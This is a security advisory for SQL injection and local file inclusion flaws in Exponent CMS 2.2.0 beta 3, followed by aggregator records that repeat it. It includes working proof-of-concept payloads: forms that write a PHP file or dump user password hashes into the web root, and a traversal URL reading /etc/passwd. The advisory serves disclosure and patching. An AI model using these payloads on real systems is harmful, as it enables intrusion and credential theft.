Advisory ID: HTB23154
Product: Exponent CMS
Vendor: Online Innovative Creations
Vulnerable Version(s): 2.2.0 beta 3 and probably prior
Tested Version: 2.2.0 beta 3
Vendor Notification: April 24, 2013
Vendor Patch: May 3, 2013
Public Disclosure: May 15, 2013
Vulnerability Type: SQL Injection [CWE-89], PHP File Inclusion [CWE-98]
CVE References: CVE-2013-3294, CVE-2013-3295
Risk Level: High
CVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Exponent CMS, which can be exploited to execute arbitrary SQL commands in the database of vulnerable application and execute arbitrary PHP code on the vulnerable system.
1) SQL Injection in Exponent CMS: CVE-2013-3294
The vulnerability exists due to insufficient filtration of "src" and "username" HTTP GET parameters passed to "/index.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.
Depending on database and system configuration, the PoC (Proof-of-Concept) code below will create a "/var/www/file.php" file with PHP function 'phpinfo()':
<form action="http://[host]/index.php" method="post" name="main">
<input type="hidden" name="action" value="login">
<input type="hidden" name="int" value="1">
<input type="hidden" name="module" value="login">
<input type="hidden" name="password" value="password">
<input type="hidden" name="src" value="' UNION SELECT '<? phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- ">
<input type="hidden" name="username" value="' UNION SELECT '<? phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- ">
<input type="submit" id="btn">
</form>
The second PoC will attempt to create "/var/www/file.txt" file, containing usernames and hashed passwords of all application's users:
<form action="http://[host]/index.php" method="post" name="main">
<input type="hidden" name="action" value="login">
<input type="hidden" name="int" value="1">
<input type="hidden" name="module" value="login">
<input type="hidden" name="password" value="password">
<input type="hidden" name="src" value="' UNION SELECT CONCAT_WS(':',username,password) FROM `exponent_user` INTO OUTFILE '/var/www/file.txt' -- ">
<input type="hidden" name="username" value="' UNION SELECT CONCAT_WS(':',username,password) FROM `exponent_user` INTO OUTFILE '/var/www/file.txt' -- ">
<input type="submit" id="btn">
</form>
2) PHP File Inclusion in Exponent CMS: CVE-2013-3295
The vulnerability is caused by improper filtration of user-supplied input passed via the "page" HTTP GET parameter to "/install/popup.php" script, which is publicly accessible after CMS installation by default. A remote unauthenticated attacker can include arbitrary PHP files from the local system using directory traversal sequences with URL-encoded NULL byte, read arbitrary files or execute arbitrary PHP code on the target system.
The PoC code below will output the content of '/etc/passwd' file on vulnerable system:
http://[host]/install/popup.php?page=../../../../etc/passwd%00
-----------------------------------------------------------------------------------------------
Solution:
Upgrade to Exponent CMS v2.2.0 Release Candidate 1
More Information:
http://www.exponentcms.org/news/release-candidate-1-v2-2-0-set-loose
http://forums.exponentcms.org/viewtopic.php?f=16&t=789
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23154 - https://www.htbridge.com/advisory/HTB23154 - Multiple Vulnerabilities in Exponent CMS.
[2] Exponent CMS - http://www.exponentcms.org - Exponent is a website content management system (or CMS) that allows site owners to easily create and manage dynamic websites without necessarily directly coding web pages, or managing site navigation.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
{"lastseen": "2020-04-01T19:04:14", "references": [], "description": "\nExponent CMS 2.2.0 Beta 3 - Multiple Vulnerabilities", "edition": 1, "reporter": "High-Tech Bridge SA", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2013-05-17T00:00:00", "title": "Exponent CMS 2.2.0 Beta 3 - Multiple Vulnerabilities", "type": "exploitpack", "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-3294", "CVE-2013-3295"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310803702"]}, {"type": "zdt", "idList": ["1337DAY-ID-20782"]}, {"type": "htbridge", "idList": ["HTB23154"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:29587", "SECURITYVULNS:VULN:13172"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:121643"]}, {"type": "exploitdb", "idList": ["EDB-ID:25518"]}], "modified": "2020-04-01T19:04:14", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2020-04-01T19:04:14", "rev": 2}, "vulnersScore": 7.3}, "bulletinFamily": "exploit", "cvelist": ["CVE-2013-3294", "CVE-2013-3295"], "modified": "2013-05-17T00:00:00", "id": "EXPLOITPACK:B23C5B515DE6FC000428B56F15E6C52B", "href": "", "viewCount": 1, "sourceData": "Advisory ID: HTB23154\nProduct: Exponent CMS\nVendor: Online Innovative Creations\nVulnerable Version(s): 2.2.0 beta 3 and probably prior\nTested Version: 2.2.0 beta 3\nVendor Notification: April 24, 2013 \nVendor Patch: May 3, 2013 \nPublic Disclosure: May 15, 2013 \nVulnerability Type: SQL Injection [CWE-89], PHP File Inclusion [CWE-98]\nCVE References: CVE-2013-3294, CVE-2013-3295\nRisk Level: High \nCVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)\nSolution Status: Fixed by Vendor\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n\n-----------------------------------------------------------------------------------------------\n\nAdvisory Details:\n\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Exponent CMS, which can be exploited to execute arbitrary SQL commands in the database of vulnerable application and execute arbitrary PHP code on the vulnerable system.\n\n\n1) SQL Injection in Exponent CMS: CVE-2013-3294\n\nThe vulnerability exists due to insufficient filtration of \"src\" and \"username\" HTTP GET parameters passed to \"/index.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.\n\nDepending on database and system configuration, the PoC (Proof-of-Concept) code below will create a \"/var/www/file.php\" file with PHP function 'phpinfo()':\n\n\n<form action=\"http://[host]/index.php\" method=\"post\" name=\"main\">\n<input type=\"hidden\" name=\"action\" value=\"login\">\n<input type=\"hidden\" name=\"int\" value=\"1\">\n<input type=\"hidden\" name=\"module\" value=\"login\">\n<input type=\"hidden\" name=\"password\" value=\"password\">\n<input type=\"hidden\" name=\"src\" value=\"' UNION SELECT '<? phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- \">\n<input type=\"hidden\" name=\"username\" value=\"' UNION SELECT '<? phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- \">\n<input type=\"submit\" id=\"btn\">\n</form>\n\n\nThe second PoC will attempt to create \"/var/www/file.txt\" file, containing usernames and hashed passwords of all application's users: \n\n\n<form action=\"http://[host]/index.php\" method=\"post\" name=\"main\">\n<input type=\"hidden\" name=\"action\" value=\"login\">\n<input type=\"hidden\" name=\"int\" value=\"1\">\n<input type=\"hidden\" name=\"module\" value=\"login\">\n<input type=\"hidden\" name=\"password\" value=\"password\">\n<input type=\"hidden\" name=\"src\" value=\"' UNION SELECT CONCAT_WS(':',username,password) FROM `exponent_user` INTO OUTFILE '/var/www/file.txt' -- \">\n<input type=\"hidden\" name=\"username\" value=\"' UNION SELECT CONCAT_WS(':',username,password) FROM `exponent_user` INTO OUTFILE '/var/www/file.txt' -- \">\n<input type=\"submit\" id=\"btn\">\n</form>\n\n\n\n2) PHP File Inclusion in Exponent CMS: CVE-2013-3295\n\nThe vulnerability is caused by improper filtration of user-supplied input passed via the \"page\" HTTP GET parameter to \"/install/popup.php\" script, which is publicly accessible after CMS installation by default. A remote unauthenticated attacker can include arbitrary PHP files from the local system using directory traversal sequences with URL-encoded NULL byte, read arbitrary files or execute arbitrary PHP code on the target system. \n\nThe PoC code below will output the content of '/etc/passwd' file on vulnerable system:\n\nhttp://[host]/install/popup.php?page=../../../../etc/passwd%00\n\n-----------------------------------------------------------------------------------------------\n\nSolution:\n\nUpgrade to Exponent CMS v2.2.0 Release Candidate 1\n\nMore Information:\nhttp://www.exponentcms.org/news/release-candidate-1-v2-2-0-set-loose\nhttp://forums.exponentcms.org/viewtopic.php?f=16&t=789\n\n-----------------------------------------------------------------------------------------------\n\nReferences:\n\n[1] High-Tech Bridge Advisory HTB23154 - https://www.htbridge.com/advisory/HTB23154 - Multiple Vulnerabilities in Exponent CMS.\n[2] Exponent CMS - http://www.exponentcms.org - Exponent is a website content management system (or CMS) that allows site owners to easily create and manage dynamic websites without necessarily directly coding web pages, or managing site navigation.\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n\n-----------------------------------------------------------------------------------------------\n\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "immutableFields": []}
{"cve": [{"lastseen": "2021-04-22T23:35:51", "description": "Directory traversal vulnerability in install/popup.php in Exponent CMS before 2.2.0 RC1 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter.", "edition": 7, "cvss3": {}, "published": "2014-12-30T02:59:00", "title": "CVE-2013-3295", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-3295"], "modified": "2014-12-30T15:31:00", "cpe": ["cpe:/a:exponentcms:exponent_cms:2.2.0"], "id": "CVE-2013-3295", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3295", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:exponentcms:exponent_cms:2.2.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-04-22T23:35:51", "description": "Multiple SQL injection vulnerabilities in Exponent CMS before 2.2.0 release candidate 1 allow remote attackers to execute arbitrary SQL commands via the (1) src or (2) username parameter to index.php.", "edition": 7, "cvss3": {}, "published": "2014-02-11T17:55:00", "title": "CVE-2013-3294", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-3294"], "modified": "2017-08-29T01:33:00", "cpe": ["cpe:/a:exponentcms:exponent_cms:2.1.2", "cpe:/a:exponentcms:exponent_cms:2.0.4", "cpe:/a:exponentcms:exponent_cms:2.0.9", "cpe:/a:exponentcms:exponent_cms:2.0.7", "cpe:/a:exponentcms:exponent_cms:2.0.6", "cpe:/a:exponentcms:exponent_cms:2.0.2", "cpe:/a:exponentcms:exponent_cms:2.1.4", "cpe:/a:exponentcms:exponent_cms:0.99.0", "cpe:/a:exponentcms:exponent_cms:2.1.3", "cpe:/a:exponentcms:exponent_cms:2.0.3", "cpe:/a:exponentcms:exponent_cms:2.0.5", "cpe:/a:exponentcms:exponent_cms:2.1.0", "cpe:/a:exponentcms:exponent_cms:2.2.0", "cpe:/a:exponentcms:exponent_cms:2.0.1", "cpe:/a:exponentcms:exponent_cms:0.97.0", "cpe:/a:exponentcms:exponent_cms:2.1.1", "cpe:/a:exponentcms:exponent_cms:0.98.0", "cpe:/a:exponentcms:exponent_cms:2.0.0", "cpe:/a:exponentcms:exponent_cms:2.0.8"], "id": "CVE-2013-3294", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3294", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:exponentcms:exponent_cms:2.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:exponentcms:exponent_cms:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:exponentcms:exponent_cms:0.98.0:*:*:*:*:*:*:*", "cpe:2.3:a:exponentcms:exponent_cms:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:exponentcms:exponent_cms:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:exponentcms:exponent_cms:0.97.0:*:*:*:*:*:*:*", "cpe:2.3:a:exponentcms:exponent_cms:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:exponentcms:exponent_cms:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:exponentcms:exponent_cms:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:exponentcms:exponent_cms:2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:exponentcms:exponent_cms:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:exponentcms:exponent_cms:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:exponentcms:exponent_cms:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:exponentcms:exponent_cms:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:exponentcms:exponent_cms:2.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:exponentcms:exponent_cms:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:exponentcms:exponent_cms:0.99.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:exponentcms:exponent_cms:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:exponentcms:exponent_cms:2.0.0:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2018-02-10T11:32:36", "edition": 2, "description": "Exponent CMS version 2.2.0 beta 3 suffers from local file inclusion and remote SQL injection vulnerabilities.", "published": "2013-05-16T00:00:00", "type": "zdt", "title": "Exponent CMS 2.2.0 Beta 3 LFI / SQL Injection Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-3294", "CVE-2013-3295"], "modified": "2013-05-16T00:00:00", "id": "1337DAY-ID-20782", "href": "https://0day.today/exploit/description/20782", "sourceData": "Product: Exponent CMS\r\nVendor: Online Innovative Creations\r\nVulnerable Version(s): 2.2.0 beta 3 and probably prior\r\nTested Version: 2.2.0 beta 3\r\nVendor Notification: April 24, 2013 \r\nVendor Patch: May 3, 2013 \r\nPublic Disclosure: May 15, 2013 \r\nVulnerability Type: SQL Injection [CWE-89], PHP File Inclusion [CWE-98]\r\nCVE References: CVE-2013-3294, CVE-2013-3295\r\nRisk Level: High \r\nCVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Exponent CMS, which can be exploited to execute arbitrary SQL commands in the database of vulnerable application and execute arbitrary PHP code on the vulnerable system.\r\n\r\n\r\n1) SQL Injection in Exponent CMS: CVE-2013-3294\r\n\r\nThe vulnerability exists due to insufficient filtration of \"src\" and \"username\" HTTP GET parameters passed to \"/index.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.\r\n\r\nDepending on database and system configuration, the PoC (Proof-of-Concept) code below will create a \"/var/www/file.php\" file with PHP function 'phpinfo()':\r\n\r\n\r\n<form action=\"http://[host]/index.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"action\" value=\"login\">\r\n<input type=\"hidden\" name=\"int\" value=\"1\">\r\n<input type=\"hidden\" name=\"module\" value=\"login\">\r\n<input type=\"hidden\" name=\"password\" value=\"password\">\r\n<input type=\"hidden\" name=\"src\" value=\"' UNION SELECT '<? phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- \">\r\n<input type=\"hidden\" name=\"username\" value=\"' UNION SELECT '<? phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- \">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n\r\nThe second PoC will attempt to create \"/var/www/file.txt\" file, containing usernames and hashed passwords of all application's users: \r\n\r\n\r\n<form action=\"http://[host]/index.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"action\" value=\"login\">\r\n<input type=\"hidden\" name=\"int\" value=\"1\">\r\n<input type=\"hidden\" name=\"module\" value=\"login\">\r\n<input type=\"hidden\" name=\"password\" value=\"password\">\r\n<input type=\"hidden\" name=\"src\" value=\"' UNION SELECT CONCAT_WS(':',username,password) FROM `exponent_user` INTO OUTFILE '/var/www/file.txt' -- \">\r\n<input type=\"hidden\" name=\"username\" value=\"' UNION SELECT CONCAT_WS(':',username,password) FROM `exponent_user` INTO OUTFILE '/var/www/file.txt' -- \">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n\r\n\r\n2) PHP File Inclusion in Exponent CMS: CVE-2013-3295\r\n\r\nThe vulnerability is caused by improper filtration of user-supplied input passed via the \"page\" HTTP GET parameter to \"/install/popup.php\" script, which is publicly accessible after CMS installation by default. A remote unauthenticated attacker can include arbitrary PHP files from the local system using directory traversal sequences with URL-encoded NULL byte, read arbitrary files or execute arbitrary PHP code on the target system. \r\n\r\nThe PoC code below will output the content of '/etc/passwd' file on vulnerable system:\r\n\r\nhttp://[host]/install/popup.php?page=../../../../etc/passwd%00\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpgrade to Exponent CMS v2.2.0 Release Candidate 1\r\n\r\nMore Information:\r\nhttp://www.exponentcms.org/news/release-candidate-1-v2-2-0-set-loose\r\nhttp://forums.exponentcms.org/viewtopic.php?f=16&t=789\n\n# 0day.today [2018-02-10] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/20782"}], "packetstorm": [{"lastseen": "2016-12-05T22:15:40", "description": "", "published": "2013-05-15T00:00:00", "type": "packetstorm", "title": "Exponent CMS 2.2.0 Beta 3 LFI / SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-3294", "CVE-2013-3295"], "modified": "2013-05-15T00:00:00", "id": "PACKETSTORM:121643", "href": "https://packetstormsecurity.com/files/121643/Exponent-CMS-2.2.0-Beta-3-LFI-SQL-Injection.html", "sourceData": "`Advisory ID: HTB23154 \nProduct: Exponent CMS \nVendor: Online Innovative Creations \nVulnerable Version(s): 2.2.0 beta 3 and probably prior \nTested Version: 2.2.0 beta 3 \nVendor Notification: April 24, 2013 \nVendor Patch: May 3, 2013 \nPublic Disclosure: May 15, 2013 \nVulnerability Type: SQL Injection [CWE-89], PHP File Inclusion [CWE-98] \nCVE References: CVE-2013-3294, CVE-2013-3295 \nRisk Level: High \nCVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Exponent CMS, which can be exploited to execute arbitrary SQL commands in the database of vulnerable application and execute arbitrary PHP code on the vulnerable system. \n \n \n1) SQL Injection in Exponent CMS: CVE-2013-3294 \n \nThe vulnerability exists due to insufficient filtration of \"src\" and \"username\" HTTP GET parameters passed to \"/index.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database. \n \nDepending on database and system configuration, the PoC (Proof-of-Concept) code below will create a \"/var/www/file.php\" file with PHP function 'phpinfo()': \n \n \n<form action=\"http://[host]/index.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"action\" value=\"login\"> \n<input type=\"hidden\" name=\"int\" value=\"1\"> \n<input type=\"hidden\" name=\"module\" value=\"login\"> \n<input type=\"hidden\" name=\"password\" value=\"password\"> \n<input type=\"hidden\" name=\"src\" value=\"' UNION SELECT '<? phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- \"> \n<input type=\"hidden\" name=\"username\" value=\"' UNION SELECT '<? phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- \"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n \nThe second PoC will attempt to create \"/var/www/file.txt\" file, containing usernames and hashed passwords of all application's users: \n \n \n<form action=\"http://[host]/index.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"action\" value=\"login\"> \n<input type=\"hidden\" name=\"int\" value=\"1\"> \n<input type=\"hidden\" name=\"module\" value=\"login\"> \n<input type=\"hidden\" name=\"password\" value=\"password\"> \n<input type=\"hidden\" name=\"src\" value=\"' UNION SELECT CONCAT_WS(':',username,password) FROM `exponent_user` INTO OUTFILE '/var/www/file.txt' -- \"> \n<input type=\"hidden\" name=\"username\" value=\"' UNION SELECT CONCAT_WS(':',username,password) FROM `exponent_user` INTO OUTFILE '/var/www/file.txt' -- \"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n \n \n2) PHP File Inclusion in Exponent CMS: CVE-2013-3295 \n \nThe vulnerability is caused by improper filtration of user-supplied input passed via the \"page\" HTTP GET parameter to \"/install/popup.php\" script, which is publicly accessible after CMS installation by default. A remote unauthenticated attacker can include arbitrary PHP files from the local system using directory traversal sequences with URL-encoded NULL byte, read arbitrary files or execute arbitrary PHP code on the target system. \n \nThe PoC code below will output the content of '/etc/passwd' file on vulnerable system: \n \nhttp://[host]/install/popup.php?page=../../../../etc/passwd%00 \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpgrade to Exponent CMS v2.2.0 Release Candidate 1 \n \nMore Information: \nhttp://www.exponentcms.org/news/release-candidate-1-v2-2-0-set-loose \nhttp://forums.exponentcms.org/viewtopic.php?f=16&t=789 \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23154 - https://www.htbridge.com/advisory/HTB23154 - Multiple Vulnerabilities in Exponent CMS. \n[2] Exponent CMS - http://www.exponentcms.org - Exponent is a website content management system (or CMS) that allows site owners to easily create and manage dynamic websites without necessarily directly coding web pages, or managing site navigation. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/121643/exponentcms-lfisql.txt"}], "htbridge": [{"lastseen": "2020-12-24T11:12:38", "bulletinFamily": "software", "cvelist": ["CVE-2013-3294", "CVE-2013-3295"], "description": "High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Exponent CMS, which can be exploited to execute arbitrary SQL commands in the database of vulnerable application and execute arbitrary PHP code on the vulnerable system. \n \n1) SQL Injection in Exponent CMS: CVE-2013-3294 \nThe vulnerability exists due to insufficient filtration of \"src\" and \"username\" HTTP GET parameters passed to \"/index.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database. \nDepending on database and system configuration, the PoC (Proof-of-Concept) code below will create a \"/var/www/file.php\" file with PHP function 'phpinfo()': \n<form action=\"http://[host]/index.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"action\" value=\"login\"> \n<input type=\"hidden\" name=\"int\" value=\"1\"> \n<input type=\"hidden\" name=\"module\" value=\"login\"> \n<input type=\"hidden\" name=\"password\" value=\"password\"> \n<input type=\"hidden\" name=\"src\" value=\"' UNION SELECT '<? phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- \"> \n<input type=\"hidden\" name=\"username\" value=\"' UNION SELECT '<? phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- \"> \n<input type=\"submit\" id=\"btn\"> \n</form> \nThe second PoC will attempt to create \"/var/www/file.txt\" file, containing usernames and hashed passwords of all application's users: \n<form action=\"http://[host]/index.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"action\" value=\"login\"> \n<input type=\"hidden\" name=\"int\" value=\"1\"> \n<input type=\"hidden\" name=\"module\" value=\"login\"> \n<input type=\"hidden\" name=\"password\" value=\"password\"> \n<input type=\"hidden\" name=\"src\" value=\"' UNION SELECT CONCAT_WS(':',username,password) FROM `exponent_user` INTO OUTFILE '/var/www/file.txt' -- \"> \n<input type=\"hidden\" name=\"username\" value=\"' UNION SELECT CONCAT_WS(':',username,password) FROM `exponent_user` INTO OUTFILE '/var/www/file.txt' -- \"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n2) PHP File Inclusion in Exponent CMS: CVE-2013-3295 \nThe vulnerability is caused by improper filtration of user-supplied input passed via the \"page\" HTTP GET parameter to \"/install/popup.php\" script, which is publicly accessible after CMS installation by default. A remote unauthenticated attacker can include arbitrary PHP files from the local system using directory traversal sequences with URL-encoded NULL byte, read arbitrary files or execute arbitrary PHP code on the target system. \nThe PoC code below will output the content of '/etc/passwd' file on vulnerable system: \nhttp://[host]/install/popup.php?page=../../../../etc/passwd%00\n", "modified": "2013-05-06T00:00:00", "published": "2013-04-24T00:00:00", "id": "HTB23154", "href": "https://www.htbridge.com/advisory/HTB23154", "type": "htbridge", "title": "Multiple Vulnerabilities in Exponent CMS", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:48", "bulletinFamily": "software", "cvelist": ["CVE-2013-3294", "CVE-2013-3295"], "description": "\r\n\r\nAdvisory ID: HTB23154\r\nProduct: Exponent CMS\r\nVendor: Online Innovative Creations\r\nVulnerable Version(s): 2.2.0 beta 3 and probably prior\r\nTested Version: 2.2.0 beta 3\r\nVendor Notification: April 24, 2013 \r\nVendor Patch: May 3, 2013 \r\nPublic Disclosure: May 15, 2013 \r\nVulnerability Type: SQL Injection [CWE-89], PHP File Inclusion [CWE-98]\r\nCVE References: CVE-2013-3294, CVE-2013-3295\r\nRisk Level: High \r\nCVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Exponent CMS, which can be exploited to execute arbitrary SQL commands in the database of vulnerable application and execute arbitrary PHP code on the vulnerable system.\r\n\r\n\r\n1) SQL Injection in Exponent CMS: CVE-2013-3294\r\n\r\nThe vulnerability exists due to insufficient filtration of "src" and "username" HTTP GET parameters passed to "/index.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.\r\n\r\nDepending on database and system configuration, the PoC (Proof-of-Concept) code below will create a "/var/www/file.php" file with PHP function 'phpinfo()':\r\n\r\n\r\n<form action="http://[host]/index.php" method="post" name="main">\r\n<input type="hidden" name="action" value="login">\r\n<input type="hidden" name="int" value="1">\r\n<input type="hidden" name="module" value="login">\r\n<input type="hidden" name="password" value="password">\r\n<input type="hidden" name="src" value="' UNION SELECT '<? phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- ">\r\n<input type="hidden" name="username" value="' UNION SELECT '<? phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- ">\r\n<input type="submit" id="btn">\r\n</form>\r\n\r\n\r\nThe second PoC will attempt to create "/var/www/file.txt" file, containing usernames and hashed passwords of all application's users: \r\n\r\n\r\n<form action="http://[host]/index.php" method="post" name="main">\r\n<input type="hidden" name="action" value="login">\r\n<input type="hidden" name="int" value="1">\r\n<input type="hidden" name="module" value="login">\r\n<input type="hidden" name="password" value="password">\r\n<input type="hidden" name="src" value="' UNION SELECT CONCAT_WS(':',username,password) FROM `exponent_user` INTO OUTFILE '/var/www/file.txt' -- ">\r\n<input type="hidden" name="username" value="' UNION SELECT CONCAT_WS(':',username,password) 